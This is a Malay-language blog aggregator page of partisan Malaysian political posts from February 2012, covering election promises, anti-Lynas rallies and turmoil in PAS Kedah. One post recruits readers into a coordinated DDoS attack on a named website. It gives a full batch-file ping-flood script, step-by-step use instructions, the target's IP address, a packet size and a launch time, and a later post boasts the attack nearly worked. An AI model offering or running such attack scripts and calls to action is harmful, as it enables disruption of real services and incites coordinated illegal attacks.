Isnin, 27 Februari 2012

Blog-list Malaysia

Blog-list Malaysia


PRU 13 - Najib Semakin Galak Tabur Janji Palsu

Posted: 27 Feb 2012 01:13 AM PST

BN terus menaburkan janji pilihan raya hari ini dengan Perdana Menteri Datuk Seri Najib Razak berkata sekiranya mereka merampas kembali majoriti dua pertiga di Dewan Rakyat pada pilihan raya umum akan datang,

Antaranya, Najib yang juga pengerusi BN itu berkata Suruhanjaya Pencegahan Rasuah Malaysia (SPRM) akan diberi lebih kebebasan.

Sebuah Suruhanjaya Perkhidmatan Anti Rasuah, seperti yang dicadangkan oleh lembaga penasihat SPRM, akan ditubuhkan untuk membolehkan badan pemantau anti-rasuah itu mempunyai kawalan penuh ke atas pegawai-pegawainya, termasuk kuasa untuk melantik dan memecat mereka, katanya.


"Saya bersetuju dengan pandangan lembaga penasihat SPRM bahawa untuk mencerminkan kebebasan SPRM, sebuah Suruhanjaya Perkhidmatan Anti Rasuah perlu diwujudkan. Suruhanjaya ini akan diberi kuasa untuk melantik dan memecat kakitangan SPRM.

"Tetapi isu ini perlu pindaan perlembagaan. Insya-Allah jika BN diberi mandat dua pertiga dalam pilihan raya umum ke-13 yang akan datang, pindaan perlembagaan akan dijalankan dan suruhanjaya ini akan ditubuhkan," kata Najib semasa satu majlis di Putrajaya hari ini.

Buat masa ini, kakitangan SPRM adalah di bawah bidang kuasa Suruhanjaya Perkhidmatan Awam, sama seperti semua agensi kerajaan yang lain.

Antara perkara lain yang juga dipertimbangkan oleh kerajaan, kata Najib, adalah status Ketua Pesuruhjaya SPRM, yang boleh dinaik taraf mengikut perlembagaan seperti jawatan Peguam Negara, Ketua Audit Negara dan hakim-hakim, untuk memastikan kebebasan dan ketelusan.

** Kenapa harus tunggu 2/3. Jika dibuat bila-bila masapun rasanya Pakatan Rakyat akan sokong 100% jika dibentangkan di parlimen la.. Sudah-sudahlah bodohkan rakyat..

http://malaysiakini.com/news/190444


Gara-Gara Isu Lynas, Pemuda MCA Sahkan UMNO BN Mungkin Akan Hilang Sokongan Rakyat!

Posted: 26 Feb 2012 10:32 PM PST

KUANTAN, 27 Feb - Pemuda MCA Indera Mahkota meramalkan UMNO Barisan Nasional (BN) akan berputih mata dan hanya boleh 'bermimpi' untuk merampas balik kerusi Parlimen Kuantan sekiranya gagal menghentikan projek nadir bumi Lynas sebelum Pilihan Raya Umum ke-13.

Ketuanya, David Choi (foto) berkata, kerusi berkenaan yang kini disandang Fuziah Salleh dari PKR bukan sahaja terus mendapat sokongan rakyat kerana isu Lynas, malah BN akan tewas kerana tiada sokongan penuh pengundi-pengundi Cina.

"Tidak ada harapan untuk rampas Kuantan kalau kerajaan tidak menghentikan projek ini. Kita tidak boleh cakap apa-apa kerana semua orang tahu, projek ini amat bahaya kepada generasi masa depan.


"Jika ini tidak diberi perhatian, bukan sahaja orang Cina, malah seluruh Melayu, Cina dan Orang Asli akan memprotes. Kita (MCA) seolah-olah memberikan kerusi ini kepada PKR buat kali kedua," katanya.

Ditanya sama ada beliau dan beberapa pemuda MCA menyertai Himpunan Hijau 2.0 kerana tidak bersetuju dengan dasar partinya, kata Choi, "saya menyokong kehidupan hijau dan mahu kepimpinan mendengar masalah rakyat." Menurutnya, Pemuda MCA Kuantan turut menyokong himpunan semalam dengan menghantar 50 orang wakil dan berharap kerajaan BN menghentikan projek berkenaan.


David Choi sempat bergambar dengan lain-lain pemimpin pemuda MCA
ketika mereka hadir ke Himpunan Hijau 2.0 di Padang MPK4 semalam

[Kenyataan Ketua Pemuda MCA Indera Mahkota ini jelas merupakan satu tamparan hebat buat BN pada Pilihanraya Umum akan datang. Syabas dan tahniah kita ucapkan kepada David Choi kerana dialah satu-satunya pemimpin BN yang berani tampil menyatakan sokongan kepada rakyat dalam isu ini.

Tindakan pemimpin UMNO melabelkan Lynas ditentang oleh orang Cina kerana dibayar oleh Kerajaan China dan dengki kerana tidak dapat apa-apa projek daripada Lynas jelas merupakan satu fitnah melampau yang menyebakan kaum Cina majoriti benci kepada kerajaan yang ada sekarang. Mereka pasti akan melakukan perubahan pada PRU13 ini nanti bagi membuktikan protes terhadap kerajaan.

Oleh itu, UMNO BN digesa berhati-hati dan tidak mengeluarkan kenyataan yang bodoh tentang soal Lynas mengelang pilihanraya umum akan datang. Jika tidak, sudah pasti mereka akan kempunan merampas semula kerusi parlimen Indera Mahkota dan Kuantan daripada Pakatan Rakyat. Itu hakikatnya sekarang].

PahangDaily


The Star Hina Islam.. Mana Hasan Ali Dan Ibrahim Ali?

Posted: 26 Feb 2012 09:34 PM PST


KUALA LUMPUR, 27 Feb: Kenapa gambar seperti di atas boleh disiarkan di akhbar The Star - Star 2 - Music ms 17 - hari ini, 27 Februari.

"Dan kenapa penyanyi Erykah Badu boleh buat persembahan di Kuala Lumpur setelah seolah-olah menghina Islam dengan gambar ini?" demikian pertanyaan dilontar seorang pembaca Harakahdaily yang menamakan dirinya Hamba Allah.


Beliau merujuk kepada satu artikel yang disiarkan akhbar tersebut hari ini mengenai Erykah Badu yang akan membuat persembahan di Pusat Konvensyen Kuala Lumpur.

Justeru, penyanyi Neo-Soul kelahiran Texan, Amerika Syarikat, Erykah Badu yang bakal mengadakan persembahan di Malaysia hujung Februari ini disifatkan menghina Islam.

Perkara itu jelas melalui tatu kalimah Allah yang terdapat di dadanya seperti gambar yang disiarkan akhbar The Star.

Kehadiran penyanyi yang berusia 40 tahun itu tidak sepatutnya berlaku kerana pihak berkuasa sepatutnya memantau sebarang artis luar yang ingin membuat persembahan di negara ini.

http://paspb2.blogspot.com/2012/02/mana-hasan-ali-nak-salahkan-pas-juga.html

PAS yakin isu Kedah mampu diselesaikan dengan aman

Posted: 26 Feb 2012 08:29 PM PST

PAS yakin isu kepimpinan kerajaan negeri kedah yang diterajui parti itu mampu diatasi secara harmoni melalui ukhuwah Islamiah dan musyawarah.

Ketua Penerangan PAS, Datuk Tuan Ibrahim Tuan Man berkata, melalui beberapa pertemuan dan perbincangan dengan pihak-pihak yang tidak sehaluan, parti itu mendapati isu di Kedah lebih menjurus kepada maklumat yang kurang jelas.

"Dan ada jalan penyelesaian kepada kemelut yang berlaku. Sehubungan itu, ahli dan pimpinan di semua peringkat diseru mendapatkan maklumat dari saluran rasmi parti bagi mengetahui perkembangan yang berlaku," katanya.

Dalam kenyataannya yang disiarkan oleh Harakahdaily pagi ini, Tuan Ibrahim juga berkata pelbagai usaha giat dijalankan bagi mencari jalan penyelesaian yang menguntungkan parti secara keseluruhannya.

"PAS yakin perkara ini dapat ditangani dengan baik, demi kepentingan parti, dan tambahan pula di saat seluruh jentera parti bertungkus lumus membuat persiapan bagi menghadapi pilihan raya umum ke-13.

"Sehubungan itu, semua pihak mestilah bertindak dengan tepat, jangan kerana nila setitik rosak susu sebelanga. Ketepikan emosi, dan fikirlah dari sudut parti dan bukan sudut peribadi," kata beliau yang juga pesuruhjaya PAS Pahang.

Semalam, Menteri Besar, Datuk Seri Azizan Abdul Razak dilaporkan memberitahu wartawan, hanya lapan exco kerajaan Kedah akan mengangkat sumpah di Istana Anak Bukit, esok berbanding 10 sebelum ini.

Sidang media khas pagi ini

Exco yang disebut-sebut tidak akan dilantik semula itu ialah Pengerusi Jawatankuasa Perumahan, Kerajaan Tempatan, Jawatankuasa Kerja Raya, Bekalan Air, Sumber Air Dan Tenaga Datuk Phahrolrazi Zawawi yang merupakan timbalan pesuruhjaya I PAS Kedah.

Manakala seorang lagi Pengerusi Kesihatan, Badan-Badan Bukan Kerajaan (NGO), Pembangunan Insan, Sains dan Inovasi, Teknologi Maklumat dan Komunikasi negeri Datuk Dr Ismail Salleh yang juga adalah timbalan pesuruhjaya II PAS Kedah.

Mereka dipercayai berbuat demikian kerana kecewa dengan sikap serta kepimpinan Azizan yang juga pesuruhjaya PAS negeri, berhubung pelbagai isu yang melanda pentadbirannya sejak kebelakangan ini.

Mengulas perkembangan itu, Tuan Ibrahim juga berkata dalam cabaran media baru tanpa kawalan ini, penyebaran maklumat yang tidak sahih serta andaian peribadi tanpa asas jemaah yang kukuh, tidak membantu mengeratkan hubungan dan memperkasakan parti.

"Perbezaan pandangan tidak seharusnya merosakkan asas ikatan jemaah. Sebarang tindakan mestilah berada dalam ruang lingkup pemikiran jemaah," katanya lagi.

Sebelum ini, Naib Presiden PAS, Salahudin Ayub turut meminta semua ahli mendapatkan maklumat dari sumber parti yang sah tentang apa yang sedang berlaku di negeri itu.

Media dan blog pro-BN dilapor menyebarkan pelbagai laporan tidak tepat berhubung apa yang berlaku di Kedah sekarang, termasuk melaga-lagakan pimpinan PAS.

Dalam perkembangan berkaitan, Salahudin dan Setiausaha Agung Datuk Mustafa Ali dijadual mengadakan sidang media khas di ibu pejabat parti di Kuala Lumpur pagi ini bagi menjawab kekusutan di sebalik isu tersebut.


Demo Anti-Lynas - Gelagat Dan Aksi Bodoh Beruk Umno Penang

Posted: 26 Feb 2012 04:47 PM PST











Giliran Nurul Izzah Diserang Beruk Belaan Umno

Posted: 26 Feb 2012 02:31 PM PST

Samseng upahan Umno terus mengganas dengan mengganggu ceramah Pakatan Rakyat, kali ini di Felda Lepar Hilir, Gambang, Kuantan, Pahang, malam semalam (26 Februari).

Sekalipun perbuatan liar di Parlimen Sembrong minggu lalu masih segar dalam ingatan rakyat, kejadian yang sebati dengan Umno kebelakangan ini, kian berleluasa.

Kali ini, Pengarah Komunikasi KEADILAN, Nik Nazmi Nik Ahmad berkata, Naib Presiden KEADILAN, Nurul Izzah Anwar nyaris menjadi mangsa.


"Budak-budak muda cuba pukul Nurul Izzah di ceramah kami di Felda Lepah Hilir. Saya dan Nurul Izzah diiringi polis keluar untuk elak samseng Umno," katanya.

Menulis di Twitter kira-kira jam 11 malam, Nik Nazmi menyifatkan keganasan samseng yang menghalang ceramah Pakatan membuktikan Felda bukan lagi kubu kuat Umno BN.

Dalam reaksi awal, Nurul Izzah menyatakan syukur kerana selamat tetapi tidak gentar dengan kejadian itu, sekalipun berdepan gelagat liar samseng berkenaan.

"Bersyukur pulang dgn selamat. Moga teman-teman di Felda Lepar Hilir juga bertahan dan bersemangat walaupun samseng-samseng Umno berlagak liar, ugut fizikal.

"Tangan (penumbuk) hanya beberapa inci dari (wajah) saya ," katanya di Twitter jam 1 pagi ini.

Sehubungan itu, Nik Nazmi dan Nurul Izzah akan membuat laporan di balai polis Merchant Square berdekatan ibu pejabat KEADILAN jam 3 petang hari ini.

Mengulas kejadian itu, Ketua Angkatan Muda KEADILAN (AMK) Pusat, Shamsul Iskandar Mat Akin melabel insiden itu sebagai budaya gangsterisme Umno.

Petang tadi, sekumpulan samseng Umno menaiki pentas acara Himpunan Hijau di Pulau Pinang dan menghambur kata-kata kesat terhadap ketua menteri, Lim Guan Eng.

Minggu lalu, kereta Datuk Seri Anwar Ibrahim dibaling batu dalam ceramah di parlimen Sembrong, menyebabkan cerminnya retak manakala bahagian sisi kenderaan kemek.

Ketua AMK Johor, Mohd Nazri Ismail cedera ketika cuba menghalang samseng upahan Umno dari menghampiri Ketua Pembangkang.

Dalam kejadian itu, samseng yang kebanyakannya berkemaja-T merah dan membawa bendera Barisan Nasional (BN) turut melempar botol, kayu dan telur.

http://jalanpulang1978.blogspot.com/2012/02/selepas-anwar-ibrahim-nurul-izzah-pula.html


Serangan DDOS Hampir Berjaya.. Teruskan Serangan

Posted: 26 Feb 2012 07:07 AM PST

Hasil setakat jam 11.06 malam


Umno Hantar Beruk Batu Feringhi Ganggu Demo Anti-Lynas Di P. Pinang

Posted: 26 Feb 2012 06:39 AM PST


Semua Himpunan Hijau 2.0 yang diadakan di seluruh negara bagi membantah keputusan kerajaan membenarkan loji pemprosesan nadir bumi milik Lynas Advanced Material Plant (Lamp) beroperasi di Gebeng, Pahang berjalan lancar kecuali di Pulau Pinang.

Himpunan Hijau di Sudut Pidato, Padang Kota, Esplanade itu dicemari apabila kira-kira 50 orang, termasuk pemimpin tempatan dari Pemuda Umno dan kumpulan pendesak Melayu, PERKASA mengganggu acara yang dijalankan itu.


Ketika acara itu dimulakan pada jam 6 petang, kumpulan itu mula menjerit kepada orang ramai yang berhimpun secara aman itu dan memberi amaran kepada mereka bahawa isu Lynas itu bukan "isu Pulau Pinang" dengan melaungkan slogan "Hidup Umno", "Kami mahukan kebebasan" dan "Balik Kuantan (Kembali ke Kuantan)".

Kira-kira 500 penyokong Himpunan Hijau kemudian membalas dengan laungan "Hidup Rakyat".

Selepas 15 minit berlalu keadaan semakin tegang, namun tidak ada kelibat polis dilaporkan memantau keadaan.

Ketua Menteri Pulau Pinang Lim Guan Eng tiba kira-kira jam 6:30 petang dan berucap kepada hadirin bahawa Pakatan Rakyat berpendirian tegas bahawa tidak akan menyokong kilang penapisan nadir bumi bernilai RM700 juta yang dibina di Gebeng, dekat Kuantan itu kerana bahaya pencemaran bahan radioaktif.

Beliau juga menggesa rakyat yang hadir supaya tidak diperbodohkan dan digertak oleh kumpulan yang berkumpul berhampiran.

Wartawan dibelasah

Apabila mendengar nasihat Lim itu, kumpulan berkenaan terus mencaci Lim dan melemparkan kata-kata kesat ke atas setiausaha agung DAP itu. Para hadirin kemudian bertindak dengan mem-boo mereka.

Berikutan itu, Lim mula meninggalkan pentas dan menyertai orang ramai tetapi kumpulan itu mula mengasak para hadirin sehingga mengakibatkan berlakunya pertengkaran.

Menurut orang saksi, seorang wartawan dan seorang jurugambar sebuah akhbar berbahasa Cina cedera didakwa dipukul dengan topi keledar.

Mereka dikenal-pasti sebagai wartawan dan jurugambar akhbar Kwong Wah Jit Poh iaitu Andrew Chew, 29, dan Lee Hong Chun, 25, masing-masing cedera di bahagian badan dan kepala.

Mereka kini dirawat di Hospital Pulau Pinang (HPP).

Pihak polis akhirnya tiba pada jam 7:15 malam dan menagarahkan orang ramai supaya bersurai.

Sementara itu, menurut laporan Benama, Ketua Polis Negeri Datuk Ayub Yaakob berkata penganjur langsung tidak memaklumkan kepada polis mengenai acara itu sehingga berlaku kekecohan.

"Memang tidak memerlukan permit tetapi sepatutnya penganjur memaklumkan atau berunding dengan pihak polis berhubung perhimpunan berkenaan supaya polis dapat bersiap sedia atau menempatkan anggota di kawasan berkenaan bagi mengelak sebarang perkara tidak diingini berlaku.

"Bila berlaku kekecohan, baru penganjur maklumkannya dan mereka juga cuba menyalahkan polis kerana lambat bertindak," katanya.

Tidak seperti Pulau Pinang, perhimpunan solidariti di bandar-bandar utama tempat lain berjalan dengan lancar.

Di BUKIT MERAH, Perak kira-kira 1,000 orang berkumpul di bekas tapak penapisan Asian Rare Earth (ARE) pada jam 11 pagi. Mereka berhimpun selama 90 minit untuk menunjukkan sokongan kepada rakan-rakan di Kuantan.

Penganjur perhimpunan itu Hew Yoon Tat, ketika dihubungi, berkata beliau memberikan ucapan pada majlis itu di mana beliau mengingatkan orang ramai bahawa kerja-kerja pembersihan terhadap projek yang terbelangkai itu sekarang masih berterusan dan menimbulkan bahaya.

Gunting rambut

"Kerajaan harus menguatkuasakan larangan menyeluruh terhadap kilang pemprosesan nadir bumi," katanya.

Di KUALA LUMPUR, kira-kira 500 orang berkumpul di hadapan pusat membeli-belah Maju Junction sepanjang Jalan Tunku Abdul Rahman dalam perhimpunan tiga jam.

Perhimpunan diadakan dalam suasana seolah-olah peserta sedang berpesta dengan mereka menyanyikan lagu-lagu dan memaparkan sepanduk kepada kenderaan yang melalui jalan berkenaan. Bunyi hon sebagai menyokong perhimpunan itu menjadikan suasana sebegitu bising.

Selain daripada pertunjukan muzikal, sesetengah peserta juga menderma sebahagian kecil rambut mereka yang digunakan untuk mengeja perkataan "Hentikan Lynas, Selamatkan Malaysia" di kaki lima.

Di KUCHING, Sarawak, kira-kira 30 orang berhimpun di Taman Sahabat, Jalan Song. Bagaimanapun perhimpunan itu terpaksa dipendekkan kepada hanya 15 minit kerana hujan lebat.

Penganjur William Lee menarik perbandingan antara kilang Lynas dan kilang melebur aluminium di Balingian, Sarawak yang katanya telah menyebabkan beberapa tumbuhan sekitar lingkungan 3km mati.

Beliau memberi amaran bahawa perkara yang sama mungkin berlaku di Gebeng.

Terdapat juga laporan perhimpunan solidariti juga diadakan di Tawau, Kota Kinabalu, Sibu, Miri, Kluang dan juga sejauh Melbourne.


1 Jam Lagi Sebelum Serangan Dilancarkan..

Posted: 26 Feb 2012 05:05 AM PST

Demo membantah dan mengutuk tindakan tentera syaitan Amerika membakar Al-Quran baru2 ni tidak mencukupi jika anda tak bersama kami menjahanamkan satu portal yang cukup menghina dan mengguris umat islam iaitu http://www.burn-the-koran.com//dengan cara serangan DDOS atau Distributed Denial of Service.

Pihak kami sedang bertungkus lumus untuk menghancurkan website ini dan sementara itu kami memerlukan bantuan anda untuk menyertai kami dalam jihad kecil ini. Untuk mereka yg tidak tahu disini saya turunkan cara paling mudah untuk serangan ini. iaitu membuat aplikasi DDOS (Distributed Denial of Service) dengan bantuan Batch File. Semoga usaha kita ini diberkati Allah S.W.T ...... TAKBIR !!

Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !


Sila ikut Step By Step :

.::[Cara Pembuatan]::.

1) Buka notepad

2) Copy Code yg di bold dibawah ini

@echo off



mode 67,16




title DDOS Attack by d43n91n3




color 0a


cls


echo.


echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


echo DDOS With Batchfile



echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


echo.


set /p x=Server-Target:


echo.


echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




ping %x%




echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



@ping.exe 127.0.0.1 -n 5 -w 1000 > nul



goto Next


:Next


echo.


echo.



echo.


set /p m=ip Host:


echo.


set /p n=Packet Size:


echo.


:DDOS


color 0c


echo Attacking Server %m%


ping %m% -i %n% -t >nul


goto DDOS



3) Paste code tersebut kedalam notepad anda

4) Save as file tersebut pilih all file.

5) tukarkan nama file dan extension file tersebut kepada "DDOS.bat"

6) Siap cara pembuatan

Atau download saja disini click

.::Cara Guna::.

1) Buka File "DDOS.bat" itu tadi.

2) Pada menu Server Target tersebut, Masukkan Url website iaitu :

burn-the-koran.com

3) Tekan "Enter"

4) Selepas anda tekan enter, applikasi ini akan memaparkan :

ip Host

5) Langkah seterusnya, Bila applikasi ini minta anda masukkan "ip host" anda perlulah memasukkan Nombor IP yang telah tercatit semasa ujian Ping diatas dilakukan iaitu

64.182.89.11

6) Tekan "Enter"

7) Seterusnya anda di minta untuk memasukkan di bahagian "Packet Size". Masukkan jumah "100000"

8) Kemudian tekan butang "Enter"

9) DONE ! Tahniah !Serangan DDOS telah berjaya anda jalankan !

10) Serangan DDOS ini akan berlaku selagi anda belum tutup Applikasi ini.

11) Biarkan Applikasi ini berjalan dan anda boleh buat perkara lain...tido ke no hal.

12)Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !

11) Semoga berjaya ! TAKBIR !! ALLAHUAKBAR!!

Sumber



Demo Anti-Lynas - TV3 Kata Hanya 3 Ribu Sahaja..

Posted: 26 Feb 2012 04:32 AM PST

Betul la tu.. Yang banyak tu cuma bayang-bayang saja.. Seorang peserta ada 6-7 bayang-bayang sebab matahari kat Kuantan ada 7 biji semuanya.. hahaha..







Sedangkan menurut satu laporan yang disahkan oleh portal berita Malaysiakini, lebih 15 RIBU yang hadir berdasarkan kepada kapsiti padang dan kiraan matematik yang dilakukan oleh seorang pembaca.

Kiraan matematiknya adalah seperti berikut:

1) 40 baris dari pentas, orang ramai duduk rapat dengan anggaran kira-kira 8 kaki persegi bagi setiap orang.

2) Lebih jauh dari pentas utama, kiraannya adalah sedikit longgar, mungkin 12 kaki persegi bagi setiap orang.

3) Peserta himpunan memenuhi kira-kira seperti 130% lebih besar daripada padang bola sepak.

4) Saiz standard bagi sebuah padang bola sepak adalah kira-kira 90m kali 120m atau kira-kira 116,424 kaki persegi.

5) Dengan menambah 30% lagi keluasan akan menjadi 151,351 kaki persegi.

6) Mengambil orang ramai yang longgar pada kiraan 12 kaki persegi bagi setiap orang, kita akan mendapat 12612 orang.


JALAN PULANG


2 timbalan p'jaya PAS Kedah digugur

Posted: 26 Feb 2012 04:18 AM PST

Hanya lapan ahli exco kerajaan negeri Kedah bagi 2012 akan mengangkat sumpah di Istana Anak Bukit pada Selasa ini, berbanding 10 sebelum ini, kata Menteri Besar, Datuk Seri Azizan Abdul Razak.

Beliau berkata, lapan individu terbabit bukan muka baru.

Bercakap kepada pemberita di alor Setar hari ini, Azizan bagaimanapun berkata, dua lagi jawatan exco akan diisi kemudian dan mungkin melibatkan pelantikan baru.


"Saya sudah muktamadkan (tentang pelantikan exco), cuma ada sedikit masalah teknikal dari segi undang-undang sebab semua exco akan tamat tempoh pada 7 Mac ini.

"Jadi tak boleh nak angkat sumpah 10 orang exco pada 28 Feb ini sebab akan jadi 12 exco lah nanti sebab tarikh tamat tempoh tak sampai lagi... exco tak cukup tak apa, jangan lebih (ikut undang-undang tubuh Kedah)," katanya.

Azizan berkata setiap anggota exco yang dilantik mempunyai hak untuk menolak pelantikan itu dan pihaknya tidak ada masalah untuk melantik individu lain kerana ramai yang menawarkan diri untuk jawatan terbabit.

"Mereka boleh tolak (jika dilantik), saya lantik orang yang tak tolak. Senarai semua nama sudah dihantar kepada Tuanku (Sultan Kedah)," katanya.

Sebelum ini wujud khabar angin dua exco Kedah menghantar surat kepada Azizan bagi menyatakan keengganan dilantik semula ke jawatan itu yang dijadual diumum Selasa ini.

Dua exco yang disebut-sebut berbuat demikian ialah Pengerusi Jawatankuasa Perumahan, Kerajaan Tempatan, Jawatankuasa Kerja Raya, Bekalan Air, Sumber Air Dan Tenaga Datuk Phahrolrazi Zawawi yang merupakan Timbalan Pesuruhjaya II PAS Kedah, dan Pengerusi Kesihatan, Badan-Badan Bukan Kerajaan (NGO), Pembangunan Insan, Sains dan Inovasi, Teknologi Maklumat dan Komunikasi negeri Datuk Dr Ismail Salleh yang merupakan Timbalan Pesuruhjaya II PAS Kedah.

Mereka dipercayai berbuat demikian kerana kecewa dengan sikap serta kepemimpinan Azizan yang juga Pesuruhjaya PAS negeri, berhubung pelbagai isu yang melanda pentadbirannya sejak kebelakangan ini.

- Bernama


Tiada ulasan: